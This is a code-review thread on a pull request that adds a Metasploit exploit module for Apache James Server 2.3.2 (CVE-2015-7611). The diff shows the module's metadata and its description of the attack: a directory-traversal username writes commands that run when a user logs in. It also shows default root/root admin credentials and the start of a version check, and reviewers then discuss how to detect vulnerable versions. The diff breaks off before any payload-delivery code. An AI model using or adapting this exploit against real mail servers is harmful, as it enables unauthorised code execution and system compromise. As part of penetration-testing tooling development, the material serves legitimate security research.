modules/exploits/linux/smtp/apache_james_exec.rb

```diff
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
+      'Description'    => %q{
+        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7611'],
+          [ 'EDB', '35513'],
+          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'=> [ 'printf' ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+        ])
+      deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  def check
+    connect
+    banner = sock.get
+    if banner.include? "(JAMES SMTP Server 2.3.2)"
```

Comment:
Presumably other versions are also affected? Version comparison can be performed with `Gem::Version.new`

Reply:
I would think that versions previous to 2.3.2 would be vulnerable as well however without testing individual versions I am not positive.  This module was written specifically to exploit version 2.3.2 as there was a CVE specifically for it.  Would I still need to use Gem::Versions.new if I am only targeting one version?

Reply:
> Would I still need to use Gem::Versions.new if I am only targeting one version?

No, however ...

> I would think that versions previous to 2.3.2  would be vulnerable [...]

The usual approach here is to return `CheckCode::Detected`. Here's some psuedo-code:

```ruby
unless res =~ /JAMES Remote Administration Tool/
  return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
end

version = res.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first

unless version
  return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
end

if Gem::Version.new(version) > Gem::Version.new('2.3.2')
  return CheckCode::Safe("JAMES Remote Administration Tool #{version} is not vulnerable")
end

if Gem::Version.new(version) == Gem::Version.new('2.3.2')
  return CheckCode::Appears("JAMES Remote Administration Tool #{version} appears to be vulnerable")
end

if Gem::Version.new(version) < Gem::Version.new('2.3.2')
  return CheckCode::Detected("JAMES Remote Administration Tool #{version} may be vulnerable")
end
```